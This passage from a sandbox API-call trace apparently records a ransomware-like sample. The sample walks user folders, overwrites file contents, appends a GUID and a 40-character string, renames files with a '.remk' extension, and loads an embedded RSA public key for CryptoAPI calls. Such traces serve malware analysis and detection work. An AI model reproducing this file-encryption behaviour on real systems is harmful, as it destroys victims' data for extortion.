hHeap=0x630000, dwFlags=0x0, lpMem=0x37bca80 | out: hHeap=0x630000) returned 1 [0237.735] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0237.735] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31d6990 | out: hHeap=0x630000) returned 1 [0237.735] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b1b88 | out: hHeap=0x630000) returned 1 [0237.735] GetCurrentThreadId () returned 0x314 [0237.735] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x31c0f10 [0237.735] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x37c6b90 [0237.735] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x31a8ac8 [0237.735] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x694fd0 [0237.735] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x37bddc8 [0237.735] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fec0 [0237.735] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fea0 [0237.735] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x3192918 [0237.736] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0237.736] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0237.736] GetCurrentThreadId () returned 0x314 [0237.736] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0237.736] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0237.736] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x65dd10 [0237.736] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0237.736] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0237.736] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0237.736] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0237.736] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65dd10 | out: hHeap=0x630000) returned 1 [0237.736] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x65dd10 [0237.736] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fec0 | out: hHeap=0x630000) returned 1 [0237.736] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x31b5808 [0237.736] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fec0 [0237.736] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x3195950 [0237.736] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72feb0 [0237.736] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bca80 [0237.736] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72feb0 | out: hHeap=0x630000) returned 1 [0237.736] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72feb0 [0237.736] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fee0 [0237.737] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x68ed28 [0237.737] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x68ed18 [0237.737] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f758 [0237.737] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f768 [0237.737] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f778 [0237.737] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bca20 [0237.737] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fee0 | out: hHeap=0x630000) returned 1 [0237.737] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fee0 [0237.737] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72feb0 | out: hHeap=0x630000) returned 1 [0237.737] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72feb0 [0237.737] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f788 [0237.737] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f798 [0237.737] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f7a8 [0237.737] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bca38 [0237.737] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f798 | out: hHeap=0x630000) returned 1 [0237.737] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0f28 [0237.737] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f788 | out: hHeap=0x630000) returned 1 [0237.737] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bca08 [0237.737] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f7a8 | out: hHeap=0x630000) returned 1 [0237.738] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bca98 [0237.738] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72feb0 | out: hHeap=0x630000) returned 1 [0237.738] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72feb0 [0237.738] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f768 | out: hHeap=0x630000) returned 1 [0237.738] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bca68 [0237.738] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72feb0 | out: hHeap=0x630000) returned 1 [0237.738] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bca50 [0237.738] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x68ed28 | out: hHeap=0x630000) returned 1 [0237.738] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x37bcab0 [0237.738] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bca50 | out: hHeap=0x630000) returned 1 [0237.738] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x37bca50 [0237.738] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bca68 | out: hHeap=0x630000) returned 1 [0237.738] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x68ed28 [0237.738] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fec0 | out: hHeap=0x630000) returned 1 [0237.738] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0ea8 [0237.738] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x68ed28 | out: hHeap=0x630000) returned 1 [0237.738] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x31a0ec8 [0237.738] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bca20 | out: hHeap=0x630000) returned 1 [0237.738] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bca20 [0237.738] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fee0 | out: hHeap=0x630000) returned 1 [0237.738] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x204) returned 0x325fd48 [0237.739] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bca80 | out: hHeap=0x630000) returned 1 [0237.739] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x31f6c48 [0237.739] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bcab0 | out: hHeap=0x630000) returned 1 [0237.739] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x210) returned 0x37b5b70 [0237.739] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ec8 | out: hHeap=0x630000) returned 1 [0237.739] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10c) returned 0x72aea0 [0237.739] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x68ed18 | out: hHeap=0x630000) returned 1 [0237.739] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x31f6e78 [0237.739] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bca20 | out: hHeap=0x630000) returned 1 [0237.739] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x37b5d88 [0237.739] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6c48 | out: hHeap=0x630000) returned 1 [0237.739] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x319bc40 [0237.739] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fea0 | out: hHeap=0x630000) returned 1 [0237.739] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x694fd0 | out: hHeap=0x630000) returned 1 [0237.739] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65dd10 | out: hHeap=0x630000) returned 1 [0237.739] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x319bc40 | out: hHeap=0x630000) returned 1 [0237.740] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ea8 | out: hHeap=0x630000) returned 1 [0237.740] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6e78 | out: hHeap=0x630000) returned 1 [0237.740] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0237.740] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5d88 | out: hHeap=0x630000) returned 1 [0237.740] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72aea0 | out: hHeap=0x630000) returned 1 [0237.740] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f758 | out: hHeap=0x630000) returned 1 [0237.740] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bca50 | out: hHeap=0x630000) returned 1 [0237.740] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f778 | out: hHeap=0x630000) returned 1 [0237.740] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bca98 | out: hHeap=0x630000) returned 1 [0237.740] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0f28 | out: hHeap=0x630000) returned 1 [0237.740] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bca38 | out: hHeap=0x630000) returned 1 [0237.740] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bca08 | out: hHeap=0x630000) returned 1 [0237.740] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bddc8 | out: hHeap=0x630000) returned 1 [0237.740] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8ac8 | out: hHeap=0x630000) returned 1 [0237.740] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3192918 | out: hHeap=0x630000) returned 1 [0237.740] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc9f0 | out: hHeap=0x630000) returned 1 [0237.740] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37cf3c0 | out: hHeap=0x630000) returned 1 [0237.740] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325fd48 | out: hHeap=0x630000) returned 1 [0237.740] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3195950 | out: hHeap=0x630000) returned 1 [0237.740] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b5808 | out: hHeap=0x630000) returned 1 [0237.740] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6b30 | out: hHeap=0x630000) returned 1 [0237.741] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0f08 | out: hHeap=0x630000) returned 1 [0237.741] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72ff00 | out: hHeap=0x630000) returned 1 [0237.741] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ee8 | out: hHeap=0x630000) returned 1 [0237.741] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31d6930 | out: hHeap=0x630000) returned 1 [0237.741] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325fb40 | out: hHeap=0x630000) returned 1 [0237.741] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a90 | out: hHeap=0x630000) returned 1 [0237.741] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0d08 | out: hHeap=0x630000) returned 1 [0237.741] WriteFile (in: hFile=0x640, lpBuffer=0x37cf820*, nNumberOfBytesToWrite=0x25800, lpNumberOfBytesWritten=0x3adfb14, lpOverlapped=0x0 | out: lpBuffer=0x37cf820*, lpNumberOfBytesWritten=0x3adfb14*=0x25800, lpOverlapped=0x0) returned 1 [0237.742] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37cf820 | out: hHeap=0x630000) returned 1 [0237.742] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0xdd600, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0237.742] WriteFile (in: hFile=0x640, lpBuffer=0x31c0f10*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x31c0f10*, lpNumberOfBytesWritten=0x3adfb50*=0x100, lpOverlapped=0x0) returned 1 [0237.742] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0f10 | out: hHeap=0x630000) returned 1 [0237.742] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x711a38 [0237.742] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x428) returned 0x325fb40 [0237.742] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk", cchWideChar=-1, lpMultiByteStr=0x325fb40, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk", lpUsedDefaultChar=0x0) returned 41 [0237.742] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x430) returned 0x37b5b70 [0237.742] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325fb40 | out: hHeap=0x630000) returned 1 [0237.742] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x711a38 | out: hHeap=0x630000) returned 1 [0237.742] WriteFile (in: hFile=0x640, lpBuffer=0x37b5b70*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x37b5b70*, lpNumberOfBytesWritten=0x3adfb50*=0x28, lpOverlapped=0x0) returned 1 [0237.742] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0237.743] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0237.743] WriteFile (in: hFile=0x640, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x3adfb50*=0x26, lpOverlapped=0x0) returned 1 [0237.743] CloseHandle (hObject=0x640) returned 1 [0237.763] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xb0) returned 0x3185fa8 [0237.763] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8c0) returned 0x37bd408 [0237.763] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3185fa8 | out: hHeap=0x630000) returned 1 [0237.763] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\jre1.7.0_45\\jre1.7.0_45.msi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\sun\\java\\jre1.7.0_45\\jre1.7.0_45.msi"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\jre1.7.0_45\\jre1.7.0_45.msi.remk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\sun\\java\\jre1.7.0_45\\jre1.7.0_45.msi.remk")) returned 1 [0237.764] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bd408 | out: hHeap=0x630000) returned 1 [0237.764] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0237.764] VirtualFree (lpAddress=0x3c20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0237.766] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31658e8 | out: hHeap=0x630000) returned 1 [0237.766] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x68d26e60, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x68d26e60, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x68d26e60, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0xdd600, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="jre1.7.0_45.msi", cAlternateFileName="JRE170~1.MSI")) returned 0 [0237.766] FindClose (in: hFindFile=0x31de130 | out: hFindFile=0x31de130) returned 1 [0237.766] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a20 | out: hHeap=0x630000) returned 1 [0237.766] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65e860 | out: hHeap=0x630000) returned 1 [0237.766] PeekMessageW (in: lpMsg=0x3adff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adff08) returned 0 [0237.766] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b66c0 [0237.766] PeekMessageW (in: lpMsg=0x3adfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adfb74) returned 0 [0237.767] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b6810 [0237.767] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0237.767] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0237.767] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b6810 | out: hHeap=0x630000) returned 1 [0237.767] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\PCPKs0u\\CSFg h-wcbKcac\\xB0W_x\\dcR8Wn\\") returned="dcR8Wn\\" [0237.767] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\PCPKs0u\\CSFg h-wcbKcac\\xB0W_x\\") returned="xB0W_x\\" [0237.767] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\PCPKs0u\\CSFg h-wcbKcac\\") returned="CSFg h-wcbKcac\\" [0237.767] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\PCPKs0u\\") returned="PCPKs0u\\" [0237.767] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\") returned="Videos\\" [0237.767] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0237.767] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0237.767] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0237.767] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0237.767] PathFindFileNameW (pszPath="") returned="" [0237.767] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\PCPKs0u\\CSFg h-wcbKcac\\xB0W_x\\dcR8Wn\\*", lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5cd8ce90, ftCreationTime.dwHighDateTime=0x1d5d9dd, ftLastAccessTime.dwLowDateTime=0xd837ed60, ftLastAccessTime.dwHighDateTime=0x1d5e625, ftLastWriteTime.dwLowDateTime=0xd837ed60, ftLastWriteTime.dwHighDateTime=0x1d5e625, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x31de130 [0237.769] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b6810 | out: hHeap=0x630000) returned 1 [0237.770] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5cd8ce90, ftCreationTime.dwHighDateTime=0x1d5d9dd, ftLastAccessTime.dwLowDateTime=0xd837ed60, ftLastAccessTime.dwHighDateTime=0x1d5e625, ftLastWriteTime.dwLowDateTime=0xd837ed60, ftLastWriteTime.dwHighDateTime=0x1d5e625, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0237.770] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe32e6ad0, ftCreationTime.dwHighDateTime=0x1d5d9ac, ftLastAccessTime.dwLowDateTime=0x78ec25b0, ftLastAccessTime.dwHighDateTime=0x1d5defa, ftLastWriteTime.dwLowDateTime=0x78ec25b0, ftLastWriteTime.dwHighDateTime=0x1d5defa, nFileSizeHigh=0x0, nFileSizeLow=0xf3bf, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MMNB3DGmP9H.flv", cAlternateFileName="MMNB3D~1.FLV")) returned 1 [0237.770] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\PCPKs0u\\CSFg h-wcbKcac\\xB0W_x\\dcR8Wn\\MMNB3DGmP9H.flv") returned=".flv" [0237.770] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\PCPKs0u\\CSFg h-wcbKcac\\xB0W_x\\dcR8Wn\\MMNB3DGmP9H.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\pcpks0u\\csfg h-wcbkcac\\xb0w_x\\dcr8wn\\mmnb3dgmp9h.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x640 [0237.771] GetFileSizeEx (in: hFile=0x640, lpFileSize=0x3adfb40 | out: lpFileSize=0x3adfb40*=62399) returned 1 [0237.771] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3c20000 [0237.774] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0xf399, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0237.774] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x3adfb78, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb78*=0x26, lpOverlapped=0x0) returned 1 [0237.776] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x3adfb70, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb70*=0xf3bf, lpOverlapped=0x0) returned 1 [0237.777] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0237.777] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0237.777] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0237.777] CryptAcquireContextW (in: phProv=0x3adfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x3adfa50*=0x694fd0) returned 1 [0237.780] CryptCreateHash (in: hProv=0x694fd0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x3adfa58 | out: phHash=0x3adfa58) returned 1 [0237.780] CryptHashData (hHash=0x31de170, pbData=0x31c0d08, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0237.780] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x0, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x3adfa54) returned 1 [0237.780] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x31a0f08, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x31a0f08, pdwDataLen=0x3adfa54) returned 1 [0237.780] GetLastError () returned 0x0 [0237.780] CryptDestroyHash (hHash=0x31de170) returned 1 [0237.780] CryptReleaseContext (hProv=0x694fd0, dwFlags=0x0) returned 1 [0237.780] HeapFree (in: hHeap=0x630000, 